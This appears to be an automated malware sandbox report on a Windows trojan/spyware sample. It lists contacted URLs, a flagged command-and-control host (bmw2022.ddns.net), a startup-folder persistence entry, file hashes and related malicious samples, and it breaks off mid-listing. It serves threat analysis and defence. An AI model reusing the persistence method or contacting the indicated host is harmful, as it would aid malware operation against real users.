                                https://lookup.onenote.com/lookup/geolocation/v1DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                  		high
                                  https://cortana.aiE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                  • URL Reputation: safe
                                  		unknown
                                  http://www.fontbureau.com/designersESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                      		high
                                      https://api.powerbi.com/v1.0/myorg/importsDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                        		high
                                        https://cloudfiles.onenote.com/upload.aspxDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                          		high
                                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                            		high
                                            https://entitlement.diagnosticssdf.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                              		high
                                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                		high
                                                https://api.aadrm.com/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.sajatypeworks.comESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                		unknown
                                                https://ofcrecsvcapi-int.azurewebsites.net/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                • URL Reputation: safe
                                                		unknown
                                                http://www.founder.com.cn/cn/cTheESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                https://www.yammer.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                  		high
                                                  https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                    		high
                                                    https://api.microsoftstream.com/api/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                      		high
                                                      https://insertmedia.bing.office.net/images/hosted?host=office&amp;adlt=strict&amp;hostType=ImmersiveDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                        		high
                                                        https://cr.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                          		high
                                                          http://www.galapagosdesign.com/DPleaseESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          https://augloop.office.com;https://augloop-int.officeppe.com;https://augloop-dogfood.officeppe.com;hDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                          • Avira URL Cloud: safe
                                                          		low
                                                          http://www.urwpp.deDPleaseESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.zhongyicts.com.cnESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          		unknown
                                                          https://portal.office.com/account/?ref=ClientMeControlDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                            		high
                                                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameESjy0irMIn.exe, 00000000.00000002.1752276948.00000000023B1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://graph.ppe.windows.netDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                		high
                                                                https://res.getmicrosoftkey.com/api/redemptioneventsDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://powerlift-frontdesk.acompli.netDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://tasks.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                  		high
                                                                  https://officeci.azurewebsites.net/api/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                  • URL Reputation: safe
                                                                  		unknown
                                                                  https://sr.outlook.office.net/ws/speech/recognize/assistant/workE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                    		high
                                                                    https://api.scheduler.DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://my.microsoftpersonalcontent.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://store.office.cn/addinstemplateDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://api.aadrm.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                    • URL Reputation: safe
                                                                    		unknown
                                                                    https://outlook.office.com/autosuggest/api/v1/init?cvid=DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                      		high
                                                                      https://globaldisco.crm.dynamics.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                        		high
                                                                        https://messaging.engagement.office.com/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                          		high
                                                                          https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                            		high
                                                                            https://dev0-api.acompli.net/autodetectDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://www.odwebp.svc.msDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            https://api.diagnosticssdf.office.com/v2/feedbackE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                              		high
                                                                              https://api.powerbi.com/v1.0/myorg/groupsDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                		high
                                                                                https://web.microsoftstream.com/video/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                  		high
                                                                                  https://api.addins.store.officeppe.com/addinstemplateDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://graph.windows.netDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                    		high
                                                                                    https://dataservice.o365filtering.com/E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://officesetup.getmicrosoftkey.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://analysis.windows.net/powerbi/apiDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                      		high
                                                                                      http://www.carterandcone.comlESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://prod-global-autodetect.acompli.net/autodetectDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                      • URL Reputation: safe
                                                                                      		unknown
                                                                                      https://substrate.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                        		high
                                                                                        http://www.fontbureau.com/designers/frere-user.htmlESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://outlook.office365.com/autodiscover/autodiscover.jsonDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                            		high
                                                                                            https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                              		high
                                                                                              https://consent.config.office.com/consentcheckin/v1.0/consentsDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                		high
                                                                                                https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                  		high
                                                                                                  https://learningtools.onenote.com/learningtoolsapi/v2.0/GetvoicesDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                    		high
                                                                                                    https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                      		high
                                                                                                      https://d.docs.live.netDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      		unknown
                                                                                                      https://ncus.contentsync.DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      		unknown
                                                                                                      https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                        		high
                                                                                                        https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                          		high
                                                                                                          http://weather.service.msn.com/data.aspxDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                            		high
                                                                                                            https://apis.live.net/v5.0/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                            • URL Reputation: safe
                                                                                                            		unknown
                                                                                                            https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                              		high
                                                                                                              https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                		high
                                                                                                                https://messaging.lifecycle.office.com/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                  		high
                                                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                    		high
                                                                                                                    https://pushchannel.1drv.msDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                      		high
                                                                                                                      https://management.azure.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                        		high
                                                                                                                        https://outlook.office365.comE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                          		high
                                                                                                                          http://www.fontbureau.com/designersGESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            		high
                                                                                                                            https://wus2.contentsync.DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                            • URL Reputation: safe
                                                                                                                            		unknown
                                                                                                                            https://incidents.diagnostics.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                              		high
                                                                                                                              http://www.fontbureau.com/designers/?ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.founder.com.cn/cn/bTheESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                		unknown
                                                                                                                                https://clients.config.office.net/user/v1.0/iosE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                  		high
                                                                                                                                  https://make.powerautomate.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  		unknown
                                                                                                                                  https://api.addins.omex.office.net/api/addins/searchDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                    		high
                                                                                                                                    http://www.fontbureau.com/designers?ESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      https://insertmedia.bing.office.net/odc/insertmediaDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                        		high
                                                                                                                                        https://outlook.office365.com/api/v1.0/me/ActivitiesDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                          		high
                                                                                                                                          https://api.office.netE07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                            		high
                                                                                                                                            https://incidents.diagnosticssdf.office.comDC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                              		high
                                                                                                                                              http://www.tiro.comESjy0irMIn.exe, 00000000.00000002.1753218182.000000001C242000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              https://asgsmsproxyapi.azurewebsites.net/DC074AFF-2EAD-4843-A23B-E6F591BEDFC1.18.dr, E07C6528-A839-4E81-93DD-1D531AC22A22.15.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown

                                                                                                                                              World Map of Contacted IPs

                                                                                                                                              • No. of IPs < 25%
                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                              • 75% < No. of IPs

                                                                                                                                              Public IPs

                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                              156.196.162.149
                                                                                                                                              		bmw2022.ddns.netEgypt
                                                                                                                                              		8452TE-ASTE-ASEGtrue

                                                                                                                                              General Information

                                                                                                                                              Joe Sandbox Version:38.0.0 Ammolite
                                                                                                                                              Analysis ID:1336857
                                                                                                                                              Start date and time:2023-11-03 18:51:23 +01:00
                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                              Overall analysis duration:0h 11m 35s
                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                              Report type:full
                                                                                                                                              Cookbook file name:default.jbs
                                                                                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                              Number of analysed new started processes analysed:21
                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                              Technologies:
                                                                                                                                              • HCA enabled
                                                                                                                                              • EGA enabled
                                                                                                                                              • AMSI enabled
                                                                                                                                              Analysis Mode:default
                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                              Sample file name:ESjy0irMIn.exe
                                                                                                                                              renamed because original name is a hash value
                                                                                                                                              Original Sample Name:536018D01EE05BC37064C480178E2BF8.exe
                                                                                                                                              Detection:MAL
                                                                                                                                              Classification:mal100.troj.spyw.expl.evad.winEXE@20/146@4/1
                                                                                                                                              EGA Information:
                                                                                                                                              • Successful, ratio: 80%
                                                                                                                                              HCA Information:
                                                                                                                                              • Successful, ratio: 93%
                                                                                                                                              • Number of executed functions: 400
                                                                                                                                              • Number of non-executed functions: 59
                                                                                                                                              Cookbook Comments:
                                                                                                                                              • Found application associated with file extension: .exe
                                                                                                                                              • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                              Warnings

                                                                                                                                              • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                                                                                              • Excluded IPs from analysis (whitelisted): 23.196.184.112, 52.109.8.89, 52.109.16.112, 52.113.194.132
                                                                                                                                              • Excluded domains from analysis (whitelisted): ecs.office.com, fs.microsoft.com, slscr.update.microsoft.com, prod.configsvc1.live.com.akadns.net, ctldl.windowsupdate.com, prod.roaming1.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, s-0005-office.config.skype.com, fe3cr.delivery.mp.microsoft.com, ecs-office.s-0005.s-msedge.net, roaming.officeapps.live.com, us1.roaming1.live.com.akadns.net, ocsp.digicert.com, login.live.com, s-0005.s-msedge.net, e16604.g.akamaiedge.net, config.officeapps.live.com, us.configsvc1.live.com.akadns.net, officeclient.microsoft.com, ecs.office.trafficmanager.net, prod.fs.microsoft.com.akadns.net
                                                                                                                                              • Execution Graph export aborted for target ESjy0irMIn.exe, PID 6720 because it is empty
                                                                                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                              • VT rate limit hit for: ESjy0irMIn.exe

                                                                                                                                              Simulations

                                                                                                                                              Behavior and APIs

                                                                                                                                              TimeTypeDescription
                                                                                                                                              17:52:25AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Name.js
                                                                                                                                              18:52:23API Interceptor843813x Sleep call for process: essam@sasa2023.exe modified
                                                                                                                                              18:52:47API Interceptor7732492x Sleep call for process: splwow64.exe modified

                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                              IPs

                                                                                                                                              No context

                                                                                                                                              Domains

                                                                                                                                              No context

                                                                                                                                              ASNs

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              TE-ASTE-ASEGarm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 156.215.165.22
                                                                                                                                              oKToHgW7tv.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 41.37.179.93
                                                                                                                                              db0fa4b8db0333367e9bda3ab68b8042.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.199.203.240
                                                                                                                                              db0fa4b8db0333367e9bda3ab68b8042.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 197.51.4.242
                                                                                                                                              40nn9wqjPw.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 197.38.240.109
                                                                                                                                              ut3u2l5ZlK.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.195.208.21
                                                                                                                                              sDZf1h3xl6.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 41.41.50.152
                                                                                                                                              kJ7wgYp6Mw.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.223.144.238
                                                                                                                                              BawlgyaYk0.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 41.37.131.70
                                                                                                                                              T2b74gKWzG.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.222.254.192
                                                                                                                                              SOdsqxqato.elfGet hashmaliciousUnknownBrowse
                                                                                                                                              • 102.43.28.190
                                                                                                                                              AYSz5iu0AR.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.194.58.220
                                                                                                                                              z0r0.i686.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.215.189.31
                                                                                                                                              z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.193.80.106
                                                                                                                                              oZasOwbAre.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.220.29.238
                                                                                                                                              kRheyrmAko.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.215.129.239
                                                                                                                                              sora.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 156.193.32.244
                                                                                                                                              aILzoYwXdz.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 41.45.223.119
                                                                                                                                              zHZxBxq6je.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 197.47.156.124
                                                                                                                                              syms.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                                                              • 154.181.109.166

                                                                                                                                              JA3 Fingerprints

                                                                                                                                              No context

                                                                                                                                              Dropped Files

                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                              C:\b53dd3b256ba71dad061693a386e\1028\SetupResources.dlldotNetFx40_Full_setup.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                Scotiabank_Scanner_Driver_DigitalCheck-42180-1310v3.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                  http://download.arxivar.it/Tools/Prerequisiti/vcredist_x86_2010.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                    https://files.jalinga.com/builds/releases/jalinga_studio.4.0.2040.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                      dotNetFx40_Full_x86_x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                        https://gscs-b2c.lge.com/downloadFile?fileId=JCmfbdhuo6i4ujSC2MbC6QGet hashmaliciousUnknownBrowse
                                                                                                                                                          TinyTakeSetup_v_5_2_16.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            C:\b53dd3b256ba71dad061693a386e\1025\SetupResources.dlldotNetFx40_Full_setup.exeGet hashmaliciousPhemedrone StealerBrowse
                                                                                                                                                              dotNetFx40_Full_x86_x64.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                https://gscs-b2c.lge.com/downloadFile?fileId=JCmfbdhuo6i4ujSC2MbC6QGet hashmaliciousUnknownBrowse

                                                                                                                                                                  Created / dropped Files

                                                                                                                                                                  (copy)

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\b53dd3b256ba71dad061693a386e\Setup.exe
                                                                                                                                                                  File Type:HTML document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                  Category:dropped
                                                                                                                                                                  Size (bytes):16118
                                                                                                                                                                  Entropy (8bit):3.6434775915277604
                                                                                                                                                                  Encrypted:false
                                                                                                                                                                  SSDEEP:192:7Ddx3KOTczFQ21Kp4n5DTx1iDecPeLHLHQFJFjZWblWUxFzJzcKHjT:fdsOT01KcBUFJFEWUxFzvHH
                                                                                                                                                                  MD5:CD131D41791A543CC6F6ED1EA5BD257C
                                                                                                                                                                  SHA1:F42A2708A0B42A13530D26515274D1FCDBFE8490
                                                                                                                                                                  SHA-256:E139AF8858FE90127095AC1C4685BCD849437EF0DF7C416033554703F5D864BB
                                                                                                                                                                  SHA-512:A6EE9AF8F8C2C7ACD58DD3C42B8D70C55202B382FFC5A93772AF7BF7D7740C1162BB6D38A4307B1802294A18EB52032D410E128072AF7D4F9D54F415BE020C9A
                                                                                                                                                                  Malicious:false
                                                                                                                                                                  Reputation:moderate, very likely benign file
                                                                                                                                                                  Preview:..<.!.D.O.C.T.Y.P.E. .h.t.m.l. .P.U.B.L.I.C. .".-././.W.3.C././.D.T.D. .X.H.T.M.L. .1...1././.E.N.". .".h.t.t.p.:././.w.w.w...w.3...o.r.g./.T.R./.x.h.t.m.l.1.1./.D.T.D./.x.h.t.m.l.1.1...d.t.d.".>.....<.!.-.-. .T.h.e. .E.x.t.e.n.d.e.d. .C.o.p.y.r.i.g.h.t./.T.r.a.d.e.m.a.r.k. .L.a.n.g.u.a.g.e. .R.e.s.i.d.e.s. .A.t.:. .h.t.t.p.:././.w.w.w...m.i.c.r.o.s.o.f.t...c.o.m./.i.n.f.o./.c.p.y.r.t.I.n.f.r.g...h.t.m. .-.-.>.....<.h.t.m.l. .x.m.l.n.s.=.".h.t.t.p.:././.w.w.w...w.3...o.r.g./.1.9.9.9./.x.h.t.m.l.".>.....<.h.e.a.d.>.......<.m.e.t.a. .h.t.t.p.-.e.q.u.i.v.=.".C.o.n.t.e.n.t.-.T.y.p.e.". .c.o.n.t.e.n.t.=.".t.e.x.t./.h.t.m.l.;. .c.h.a.r.s.e.t.=.u.t.f.-.1.6."./.>.<.b.a.s.e. .t.a.r.g.e.t.=."._.b.l.a.n.k."./.>.......<.s.t.y.l.e. .t.y.p.e.=.".t.e.x.t./.c.s.s.".>.........h.t.m.l.{.o.v.e.r.f.l.o.w.:.s.c.r.o.l.l.}.........b.o.d.y.{.f.o.n.t.-.s.i.z.e.:.1.0.p.t.;.f.o.n.t.-.f.a.m.i.l.y.:.V.e.r.d.a.n.a.;.c.o.l.o.r.:.#.0.0.0.0.0.0.;.b.a.c.k.g.r.o.u.n.d.-.c.o.l.o.r.:.#.F.0.F.0.F.0.}...........h.e.a.d.e.r.

                                                                                                                                                                  C:\ProgramData\dotNetFx40_Client_setup.exe

                                                                                                                                                                  Download File
                                                                                                                                                                  Process:C:\Users\user\Desktop\ESjy0irMIn.exe
